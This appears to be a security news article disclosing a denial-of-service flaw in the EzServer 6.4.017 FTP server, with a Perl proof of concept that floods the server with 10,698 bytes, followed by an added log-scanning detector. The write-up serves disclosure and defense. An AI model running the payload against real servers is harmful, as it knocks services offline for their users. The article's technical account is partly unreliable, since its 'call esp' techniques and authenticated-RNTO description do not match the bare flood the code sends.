CyberSecurity SEE

EzServer 6.4.017 Denial Of Service

A flaw in the EzServer 6.4.017 software has been discovered by cybersecurity researcher Fernando Mengali. The vulnerability, classified as a Denial of Service (DoS) issue, was reported on January 22, 2024. The exploit was tested on Windows XP Professional (Service Pack 2 and 3, English), where it was found to cause a denial of service on the affected server.

Mengali's write-up describes several techniques for improving the exploit's reliability and performance, including jumping to a static 'call esp' and using a backwards jump to code at a known distance from the stack pointer. The flaw lies in how the FTP server handles the number of bytes supplied with the RNTO command: when a client authenticates to the FTP server and then sends an RNTO argument containing a very large number of characters, the server crashes as soon as it receives and processes the input, resulting in a denial of service.

The successful exploitation of this vulnerability could allow remote attackers to crash the affected server, leading to a denial of service for legitimate users.

To demonstrate the exploit, Mengali shared a Proof of Concept (PoC) code snippet, which included the following code:

```perl
#!/usr/bin/perl
use strict;
use warnings;
use IO::Socket::INET;

# The snippet references $ip and $port without defining them; here they are
# taken from the command line (an assumption, not part of the published snippet).
my ($ip, $port) = @ARGV;
die "usage: $0 <host> <port>\n" unless defined $ip and defined $port;

# $^O reports "MSWin32" on Windows (not "windows"); pick the matching clear-screen command.
my $sis = "$^O";
my $cmd;
if ($sis eq "MSWin32") {
    $cmd = "cls";
} else {
    $cmd = "clear";
}
system("$cmd");
print "[+] Exploiting... \n";
# 10698 bytes of 0x41 ('A'): the input length that crashes the server.
my $payload = "\x41" x 10698;
my $sock = IO::Socket::INET->new(PeerAddr => $ip, PeerPort => $port, Proto => 'tcp')
    or die "[-] Could not connect!\n";
$sock->send($payload);
$sock->close();
print "[+] Done - Exploited success!!!!!\n\n";
```

The PoC demonstrated how the vulnerability could be exploited to crash the FTP server, thereby denying service to legitimate users.

It is crucial for users and administrators of EzServer 6.4.017 to be aware of this security flaw and take appropriate measures to mitigate the risk of exploitation. As of now, there have been no reports of a fix or patch from the vendor, making it necessary for users to remain vigilant and implement safeguards to protect their systems from potential attacks.

Given the severity of the vulnerability, users should also consider reaching out to the vendor, if available, to request an update or workaround to address the issue. In the meantime, it is recommended to closely monitor network traffic and system logs for any signs of attempted exploitation. Furthermore, implementing strong firewall rules and intrusion detection systems can provide an additional layer of defense against potential attacks targeting this vulnerability.
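One way to act on the monitoring advice above is to scan captured FTP control-channel commands for the pattern this flaw relies on: an RNTO argument far longer than any file name, or a bare payload with no FTP verb at all. The Python below is an added example, not code from the article or from Mengali's PoC; the 1024-byte threshold, the sample session lines and the idea that control-channel lines are available from a proxy or IDS log are assumptions.

```python
import re

# Threshold is an assumption: legitimate RNTO arguments are file names,
# far shorter than the ~10 KB payload described in the article.
MAX_ARG_LEN = 1024

# An FTP control line: a 3-4 letter verb, optionally one space and an argument.
FTP_CMD_RE = re.compile(r"^([A-Za-z]{3,4})(?: (.*))?$")

def parse_command(line):
    """Return (VERB, argument) for one FTP control line, or None if it has no verb."""
    m = FTP_CMD_RE.match(line.rstrip("\r\n"))
    if not m:
        return None
    return m.group(1).upper(), m.group(2) or ""

def scan_ftp_lines(lines, watched=("RNTO",), max_arg_len=MAX_ARG_LEN):
    """Return (line_no, verb, arg_len, reason) tuples for watched commands whose
    argument is oversized or a single repeated byte, and for lines with no FTP
    verb at all (the PoC sends its 'A' payload bare, without RNTO)."""
    findings = []
    for n, line in enumerate(lines, start=1):
        parsed = parse_command(line)
        if parsed is None:
            findings.append((n, "?", len(line), "no FTP verb (raw payload?)"))
            continue
        verb, arg = parsed
        if verb not in watched:
            continue
        if len(arg) > max_arg_len:
            findings.append((n, verb, len(arg), "argument exceeds length threshold"))
        elif len(arg) > 64 and len(set(arg)) == 1:
            findings.append((n, verb, len(arg), "argument is one repeated byte"))
    return findings

# Constructed sample session: a normal rename, an oversized RNTO, then a bare payload.
SAMPLE_LINES = [
    "USER anonymous\r\n",
    "PASS guest@example.org\r\n",
    "RNFR report.txt\r\n",
    "RNTO report-2024.txt\r\n",
    "RNTO " + "A" * 10698 + "\r\n",
    "A" * 10698,
]

if __name__ == "__main__":
    for line_no, verb, arg_len, reason in scan_ftp_lines(SAMPLE_LINES):
        print(f"line {line_no}: {verb} len={arg_len}: {reason}")
```

The same check can be applied to other verbs by extending `watched`; the repeated-byte heuristic catches shorter probes that stay under the length threshold.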
